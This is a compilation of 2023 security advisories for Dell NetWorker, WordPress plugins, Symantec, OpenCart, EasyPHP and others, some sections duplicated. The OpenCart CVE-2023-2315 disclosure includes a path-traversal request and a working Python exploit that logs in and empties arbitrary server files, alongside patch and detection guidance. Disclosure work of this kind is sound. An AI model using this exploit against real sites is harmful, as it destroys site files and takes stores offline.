
Dell NetWorker, Version 19.7 has an improper authorization vulnerability in the NetWorker client. An unauthenticated attacker within the same network could potentially exploit this by manipulating a command leading to gain of complete access to the server file further resulting in information leaks, denial of service, and arbitrary code execution. Dell recommends customers to upgrade at the earliest opportunity.



**Impact**

High

**Details**

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-28055

Dell NetWorker, Version 19.7 has an improper authorization vulnerability in the NetWorker client. An unauthenticated attacker within the same network could potentially exploit this by manipulating a command leading to gain of complete access to the server file further resulting in information leaks, denial of service, and arbitrary code execution. Dell recommends customers to upgrade at the earliest opportunity.

8.8

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-28055

Dell NetWorker, Version 19.7 has an improper authorization vulnerability in the NetWorker client. An unauthenticated attacker within the same network could potentially exploit this by manipulating a command leading to gain of complete access to the server file further resulting in information leaks, denial of service, and arbitrary code execution. Dell recommends customers to upgrade at the earliest opportunity.

8.8

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

CVEs Addressed

Product

Software/Firmware

Affected Versions

Remediated Versions

Link

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.9, 19.9.0.1

Versions 19.9.0.2

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.8  
through 19.8.0.2

Versions 19.8.0.3

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.7 through 19.7.0.4

Versions 19.7.0.5

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Version 19.7.1

Versions 19.9.0.2

https://www.dell.com/support/home/product-support/product/networker/drivers

CVEs Addressed

Product

Software/Firmware

Affected Versions

Remediated Versions

Link

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.9, 19.9.0.1

Versions 19.9.0.2

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.8  
through 19.8.0.2

Versions 19.8.0.3

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.7 through 19.7.0.4

Versions 19.7.0.5

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Version 19.7.1

Versions 19.9.0.2

https://www.dell.com/support/home/product-support/product/networker/drivers

**Revision History**

**Revision**

**Date**

**Description**

1.0

2023-09-26

Initial Release

2.0

2023-09-27

Added Point 4 Under "Additional Info" Section

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Additional Information**

1.  Platforms: Windows & Linux (All variants and flavors are impacted)
2.  Impacted Components: Dell NetWorker NW Client
3.  Since the capability to modify server files remotely was added in 19.7, this vulnerability is not applicable to Versions prior to 19.7.
4.  Dell recommends that you always upgrade to the latest release/version for your product

NetWorker Family, NetWorker, NetWorker Series, NetWorker Module, Product Security Information

CVE-2023-28055: DSA-2023-294: Security update for Dell NetWorker NW Client vulnerabilities

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Cornel Raiu WP Search Analytics plugin <= 1.4.7 versions.

**Solution**

 Fixed

Update the WordPress WP Search Analytics plugin to the latest available version (at least 1.4.8).

LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WP Search Analytics Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.4.8.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-30471: WordPress WP Search Analytics plugin <= 1.4.7 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack


Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.5.0.0 and 9.3.0.4, including 8.3.x.x, saves passwords of the Hadoop Copy Files step in plaintext. 



CVE-2023-2358

Symantec Protection Engine, prior to 9.1.0, may be susceptible to a Hash Leak vulnerability.



Symantec Protection Engine Security Update

**Summary**

Symantec, A Division of Broadcom has released updates to address an issue that was discovered in the Symantec Protection Engine (SPE) product.

This issue is only applicable to the legacy web console for SPE. 

**Affected Product(s)**

****

**Issue Details**

 **CVE-2023-23958**

 **Severity/CVSSv3:**

 Medium / 6.8 AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

 **References:**

 **Impact:**

 NVD: CVE-2023-23958

 Hash Leak Vulnerability

 **Description:**

Symantec Protection Engine, prior to 9.1.0, may be susceptible to a hash leak vulnerability, where sensitive information may be exposted to an actor that is not explicity authorized to have access to that information.

**Mitigation & Additional Information**

Symantec Protection Engine 9.1.0 has been made available to address this issue and can be downloaded via the Software Download Portal. Additional mitigation options are available at Symantec Protection Engine is affected by CVE-2023-23958.

Symantec recommends the following measures to reduce risk of attack:

*   Use the new Symantec Protection Engine centralized console.
*   Restrict access to administrative or management systems to authorized privileged users.
*   Restrict remote access to trusted/authorized systems only.
*   Run under the principle of least privilege, where possible, to limit the impact of potential exploit.
*   Keep all operating systems and applications current with vendor patches.
*   Follow a multi-layered approach to security. At a minimum, run both firewall and anti-malware applications to provide multiple points of detection and protection for both inbound and outbound threats.
*   Deploy network and host-based intrusion detection systems to monitor network traffic for signs of anomalous or suspicious activity. This may aid in the detection of attacks or malicious activity related to the exploitation of latent vulnerabilities.

**Acknowledgements**

*   _CVE-2023-23958: Michal Bogdanowicz and Lukasz Bialek, NORDEA BANK ABP_

CVE-2023-23958: Support Content Notification - Support Portal - Broadcom support portal

Path Traversal in OpenCart versions 4.0.0.0 to 4.0.2.2 allows an authenticated user with access/modify privilege on the Log component to empty out arbitrary files on the server

**Summary:**

**Product**

OpenCart

**Vendor**

OpenCart

**Severity**

High - Adversaries may exploit software vulnerabilities to empty any file on the server with write permissions.

**Affected Versions**

4.0.0.0 - 4.0.2.2

**Tested Version(s)**

4.0.2.2

**CVE Identifier**

CVE-2023-2315

**CVE Description**

Path traversal in Opencart versions 4.0.0.0 to 4.0.2.2 allows authenticated backend users to empty any existing file on the server with write permissions.

**CWE Classification(s)**

CWE-27 - Path Traversal: ‘dir/../../filename’

**CAPEC Classification(s)**

CAPEC-126 - Path Traversal

**CVSS3.1 Scoring System:**

**Base Score:** 8.1 (High)  
**Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

Low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

None

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview:**

Opencart is an open source ecommerce platform for online merchants to self-host and list their products for sale. It is structured in a way that allows for a quick setup and Opencart also provides a cloud solution for users who do not want to have an on-premise setup. Opencart is split into two fronts: a storefront containing a catalogue that regular users will access, as well as a backend administrative dashboard for management purposes. Account roles for the backend dashboard are highly customizable, allowing the owner of the website to initialise custom roles with different privileges and access, by using the fine-grained controls.

**Vulnerability Summary:**

There is a path traversal vulnerability at the Logs section of the backend dashboard, which allows an authenticated adversary to empty any existing file on the web server, given that there is write permissions on the file. By default, every OpenCart file is able to be emptied. This means that the availability of the website will be heavily impacted by emptying the core files, preventing regular functionality of the website. This vulnerability was introduced from versions 4.0.0.0 onward and patched in version 4.0.2.3.

**Vulnerability Details:**

A backend user with “access” and “modify” permissions on the “tool/log” setting is able to clear the logs of the website. When clearing the logs in a regular use case, a HTTP GET request is sent to delete the file “error.log”, by specifying it in the filename query parameter. The relevant code that is vulnerable can be found below:

    // /admin/controller/tool/log.php
    
    public function clear(): void {
    
        if (isset($this->request->get['filename'])) {
            $filename = (string)$this->request->get['filename']; // [1]
        } else {
            $filename = '';
        }
    
        $json = [];
    
        if (!$this->user->hasPermission('modify', 'tool/log')) {
            $json['error'] = $this->language->get('error_permission');
        }
    
        // DIR_LOGS = /system/storage/logs/
        $file = DIR_LOGS . $filename; // [2]
    
        if (!is_file($file)) {
            $json['error'] = sprintf($this->language->get('error_file'), $filename);
        }
    
        if (!$json) {
            $handle = fopen($file, 'w+'); // [3]
            fclose($handle);
            $json['success'] = $this->language->get('text_success');
        }
        // ...
    }
    

At [1], the filename is obtained from the incoming HTTP GET request and stored into the $filename PHP variable without any form of input sanitisation. At [2], the file name is appended to the back of the storage log path /system/storage/logs/ and stored into another variable $file. At [3], the $file variable is used in a fopen() function call with the mode set to w+. This means that the existing file will have its content emptied. Since a file existence check occurs before this, it is not possible to create files that do not already exist.

In a normal scenario, the file /system/storage/logs/error.log will be emptied after the GET request is sent. However, since there is a lack of input sanitisation, it is possible for the filename query parameter to contain any number of path traversal sequence (../) to traverse out of the intended directory and point to other files instead. This results in other files being emptied and permanently affecting the website’s functionality.

**Exploit Conditions:**

This vulnerability can be exploited when the attacker has a set of valid credentials to the backend dashboard with access and modify permissions on tool/log.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that exploits the Path Traversal vulnerability.

The vulnerability can be exploited by sending a GET request to https://TARGET_HOST/admin/index.php?route=tool/log.clear&user_token=<USER_TOKEN>&filename=../../../../../../tmp/PoC.txt, for example:

    GET /admin/index.php?route=tool/log.clear&filename=../../../../../../tmp/PoC.txt&user_token=4d6d604d8862798e96fe91846f28a36f HTTP/1.1
    Host: TARGET_HOST
    Cookie: OCSESSID=4f09deedf4a82f9c5b4bee9ec3;
    

Before running the exploit below, please ensure that you create a non-empty file /tmp/PoC.txt and that it has write permissions for the web user:

    $ echo "Hello" > /tmp/PoC.txt
    $ chmod 777 /tmp/PoC.txt 
    $ ls -la /tmp/PoC.txt
    -rwxrwxrwx 1 root root 6 Apr 26 09:36 /tmp/PoC.txt
    

Then, run the exploit below:

    # Opencart v4.0.0.0 - v4.0.2.2 path traversal arbitrary file emptying (CVE-2023-2315)
    # Author: Poh Jia Hao (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import re
    import requests
    import sys
    requests.packages.urllib3.disable_warnings()
    
    s = requests.Session()
    
    def check_args():
        global target, username, password
    
        print("\n======= Opencart v4.0.0.0 - v4.0.2.2 path traversal arbitrary file emptying (CVE-2023-2315) =======")
        print("Please ensure that a file /tmp/PoC.txt with write permissions has been created on the target server with non-empty content!\n")
    
        if len(sys.argv) != 4:
            print("[!] Please enter the required arguments like so: python3 {} http://TARGET_URL/ADMIN_PATH/ USERNAME PASSWORD".format(sys.argv[0]))
            sys.exit(1)
    
        target = sys.argv[1].strip("/")
        username = sys.argv[2]
        password = sys.argv[3]
    
    def authenticate():
        global user_token
    
        print("[+] Attempting to authenticate...")
    
        # Get login_token
        path = f"{target}/index.php"
        res = s.get(path)
        login_token = re.findall("login_token=(.+)\" method", res.text)[0]
        
        # Perform login and get user_token
        data = {
            "username": username,
            "password": password
        }
        path = f"{target}/index.php?route=common/login.login&login_token={login_token}"
        res = s.post(path, data=data)
        user_token = re.findall("user_token=(.+)\"", res.text)[0]
    
        if not user_token:
            print("[!] Failed to authenticate! Are the credentials correct?")
            sys.exit(1)
    
        print("[+] Authenticated successfully.")
    
    def delete():
    
        print("[+] Attempting to empty /tmp/PoC.txt...")
    
        # Empty /tmp/PoC.txt
        path = f"{target}/index.php?route=tool/log.clear&filename=../../../../../../tmp/PoC.txt&user_token={user_token}"
        res = s.get(path)
        print(f"[+] Output: {res.text}")
    
    def main():
        check_args()
        authenticate()
        delete()
    
    if __name__ == "__main__":
        main()
    

**Suggested Mitigations:**

OpenCart released version 4.0.2.3 that patches this vulnerability. It is recommended to upgrade to the latest version of OpenCart.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by checking the server’s access logs for all GET requests made to /admin/index.php?route=tool/log.clear, and filtering for requests that contain ../ in the filename query parameter.

**Credits:**

Poh Jia Hao (@Chocologicall) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline:**

*   2022-09-06 Followed the security bug reporting instructions and created an OpenCart forum account to try to report to the administrators, but new accounts are unable to send private messages.
*   2022-09-11 Email sent to [email protected] in an attempt to establish a proper communication channel with the project owner/maintainers.
*   2022-09-12 Support agent replied and suggested to describe the issue in a public channel via their GitHub Issues tracker, to which we reminded that it is a security bug on the latest version. Support agent then requested to send them the report where they will forward it to the developers. We instead requested for the public key of the developers so that the report can be encrypted to prevent information leakage. Support agent replied “they do not have such”.
*   2022-09-14 Tried the “Contact Us” form on OpenCart’s website. Ended up with a second support ticket being opened.
*   2022-09-15 Opened a GitHub Issue (#12684) in a last resort to establish a proper communication channel with the developers. Issue closed immediately by the project owner, and **marked as spam**.
*   2022-09-15 Email sent directly to [email protected] as it is used for GitHub commits.
*   2022-09-15 Project owner replied and we sent the bug report over.
*   2022-09-15 Bug fixed in commit 0a8dd91
*   2023-09-16 New release version 4.0.2.3 containing the patch.
*   2023-09-18 Public Release

CVE-2023-2315: (CVE-2023-2315) Path Traversal in OpenCart versions 4.0.0.0 to 4.0.2.2

An OS command injection vulnerability has been found on EasyPHP  Webserver affecting version 14.1. This vulnerability could allow an attacker to get full access to the system by sending a specially crafted exploit to the /index.php?zone=settings parameter. 

Fecha de publicación

26/09/2023

Recursos Afectados

EasyPHP Webserver, versión 14.1.

Descripción

INCIBE ha coordinado la publicación de 1 vulnerabilidad que afecta a EasyPHP Webserver 14.1, la cual ha sido descubierta por Rafael Pedrero.

A esta vulnerabilidad se le ha asignado el siguiente código, puntuación base CVSS v3.1, vector del CVSS y el tipo de vulnerabilidad CWE de cada vulnerabilidad:

*   **CVE-2023-3767**: CVSS v3.1: 9.8 | CVSS: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | CWE-78.

Solución

La vulnerabilidad reportada ha sido solucionada en la última versión del producto afectado.

Detalle

**CVE-2023-3767**: se ha encontrado una vulnerabilidad de inyección de comandos del sistema operativo en el servidor web EasyPHP que afecta a la versión 14.1. Esta vulnerabilidad podría permitir a un atacante obtener acceso completo al sistema enviando un _exploit_ especialmente diseñado al parámetro '/index.php?zone=settings'.

CVE-2023-3767: Inyeccion De Comandos Os En Easyphp Webserver | INCIBE-CERT

Auth. (editor+) Stored Cross-Site Scripting (XSS) vulnerability in Brett Shumaker Simple Staff List plugin <= 2.2.3 versions.

**Solution**

 Fixed

Update the WordPress Simple Staff List plugin to the latest available version (at least 2.2.4).

Found this useful? Thank Yuki Haruma for reporting this vulnerability. Buy a coffee ☕

Yuki Haruma discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Simple Staff List Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 2.2.4.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-28790: WordPress Simple Staff List plugin <= 2.2.3 - Cross Site Scripting (XSS) vulnerability - Patchstack

A use-after-free vulnerability exists in the footerr functionality of Hancom Office 2020 HWord 11.0.0.7520. A specially crafted .doc file can lead to a use-after-free. An attacker can trick a user into opening a malformed file to trigger this vulnerability.

CVE-2023-32541: TALOS-2023-1759 || Cisco Talos Intelligence Group

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Abel Ruiz GuruWalk Affiliates plugin <= 1.0.0 versions.

**Solution**

 No fix

No patched version is available.

Pavitra Tiwari discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress GuruWalk Affiliates Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-27622: WordPress GuruWalk Affiliates plugin <= 1.0.0 - Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Stored Cross-Site Scripting (XSS) vulnerability in David F. Carr RSVPMaker plugin <= 10.6.6 versions.

**Solution**

 Fixed

Update the WordPress RSVPMarker plugin to the latest available version (at least 10.6.7).

Muhammad Arsalan Diponegoro (tripoloski) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress RSVPMarker Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 10.6.7.

**Other vulnerabilities in this plugin**

 0 present

 15 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Source

CVE